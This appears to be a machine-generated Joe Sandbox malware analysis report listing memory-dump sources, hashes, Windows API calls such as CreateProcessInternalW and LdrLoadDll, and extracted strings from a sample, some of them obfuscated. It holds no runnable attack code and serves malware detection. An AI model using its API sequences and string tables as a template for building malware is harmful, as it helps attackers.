                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 0e86df40b8e2ff60be5de333c1d3996108f6b261b9232bb12763f768df99e3d2
                                                  • Instruction ID: 8c3cad9c3f06f6bde4cf130295509d0f5e42864427a39e29700cf586834892a2
                                                  • Opcode Fuzzy Hash: 0e86df40b8e2ff60be5de333c1d3996108f6b261b9232bb12763f768df99e3d2
                                                  • Instruction Fuzzy Hash: C9119E72A006086ED620EA64DC01FAF77ADEF85714F108109FA48A7280D770A9058BA5
                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F39994
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction ID: 78bff4dca6cf76807b65f5a9f8e369aece0b5f30ec6f243d66d6d9482ad1d766
                                                  • Opcode Fuzzy Hash: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction Fuzzy Hash: 89E046322002047BD220EA6ADC41F9BB76DDBC9764F508415FB08A7240CA70B9018BE0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 31ac5fc5905b5ac623ac4354bdbaf67927f4e783a2901e51fbe9fa3a930768ce
                                                  • Instruction ID: 99d0d724214cf2f7dc0ec5e893d13461f0edd6cc1dbc1a2c54aecd90d445799a
                                                  • Opcode Fuzzy Hash: 31ac5fc5905b5ac623ac4354bdbaf67927f4e783a2901e51fbe9fa3a930768ce
                                                  • Instruction Fuzzy Hash: 59900231645804139140B1584884546500997E1341B56C012E0424554C8B188A665371
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a206aa97b20e507b0981e2775fc402c684227564b718d3c48e2ac5d2c87d16d
                                                  • Instruction ID: 817cf61d7055f150aa0ad9156a137e0de01f7e0e6f16ce2660690b578b7495fb
                                                  • Opcode Fuzzy Hash: 5a206aa97b20e507b0981e2775fc402c684227564b718d3c48e2ac5d2c87d16d
                                                  • Instruction Fuzzy Hash: 7F900261641504434140B1584804406700997E2341396C116A0554560C871C89659279
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 48cf0ee8aaca16389c6db1321561eafe207c88c9aee48467fc991d5aaa13429f
                                                  • Instruction ID: befa70ed3447228d20fbf4093ea606390827daa98201ecf4c0b22ec1f59650f8
                                                  • Opcode Fuzzy Hash: 48cf0ee8aaca16389c6db1321561eafe207c88c9aee48467fc991d5aaa13429f
                                                  • Instruction Fuzzy Hash: AA90023164540C03D150B1584414746100987D1341F56C012A0024654D87598B6576B1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 11f87210a98f5f37e12b31be017a19432bd0e40ee8aea5cb3faeb51c7d313a80
                                                  • Instruction ID: b090757dc4ed84e2ce62c72504d781ec77fec45892a769b5c4996e6b1ef11707
                                                  • Opcode Fuzzy Hash: 11f87210a98f5f37e12b31be017a19432bd0e40ee8aea5cb3faeb51c7d313a80
                                                  • Instruction Fuzzy Hash: 9C90023124544C43D140B1584404A46101987D1345F56C012A0064694D97298E65B671
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4b9642e8938a655899e0627cd8802841e2b29778cf70b0ceefae52f23e5a7df0
                                                  • Instruction ID: bc838bcb05ad4f97d94506234b61db0ad6427e07792dea0006b23eea647b5667
                                                  • Opcode Fuzzy Hash: 4b9642e8938a655899e0627cd8802841e2b29778cf70b0ceefae52f23e5a7df0
                                                  • Instruction Fuzzy Hash: B290023124140C03D180B158440464A100987D2341F96C016A0025654DCB198B6977B1

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(04j58b6g,00000111,00000000,00000000), ref: 02F21207
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 04j58b6g$04j58b6g
                                                  • API String ID: 1836367815-1473487654
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02F33FCB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F22130,02F3842F,02F35AEF,02F220F3), ref: 02F285A3
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F249D2
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F2873E,00000010,?,?,?,00000044,?,00000010,02F2873E,?,?,?), ref: 02F39DD3
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F19F75
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F19F75
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,6079BA58,00000007,00000000,00000004,00000000,02F241D9,000000F4), ref: 02F39D1C
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(02F21E29,?,02F3637B,02F21E29,02F35AEF,02F3637B,?,02F21E29,02F35AEF,00001000,?,?,00000000), ref: 02F39CCF
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F287AC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F287AC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F22130,02F3842F,02F35AEF,02F220F3), ref: 02F285A3
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !4qu$#n%z$%(6 $(6/$+#i%$4quy$4yhh$72#i$7plu$`ut#$`ut4$htq{$i%(6$lqwv$lut3$l}`l$qwv7$q{yl$t4yh$tq{y$v7`p$v}|5$yhht$ylqw$ynq~$}7yh$}`{p$}zh4
                                                  • API String ID: 0-2891600505
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !&<!$"2:Y$"2As$+;2S$;2Dw$<!"$='!&$>2~{$EwpY$XVC!$ZF_^$_}h{~~s='<"2:^{|gj)2G)2S|v`}{v2&< < )2|~?|~)2UF?B' #"2Pg{~v=$`a{}$bb~w$ts`{$wqy}$yw2U${f='$|=&<
                                                  • API String ID: 0-2817562395
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  Strings
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A34725
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A34655
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A346FC
                                                  • Execute=1, xrefs: 03A34713
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A34787
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A34742
                                                  • ExecuteOptions, xrefs: 03A346A0
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A302BD
                                                  • RTL: Re-Waiting, xrefs: 03A3031E
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A302E7
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 03A37BAC
                                                  • RTL: Resource at %p, xrefs: 03A37B8E
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A37B7F
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A3728C
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 03A372C1
                                                  • RTL: Resource at %p, xrefs: 03A372A3
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A37294
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,$82?*$9$7.$;r~<$r~:;
                                                  • API String ID: 0-3609984755
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
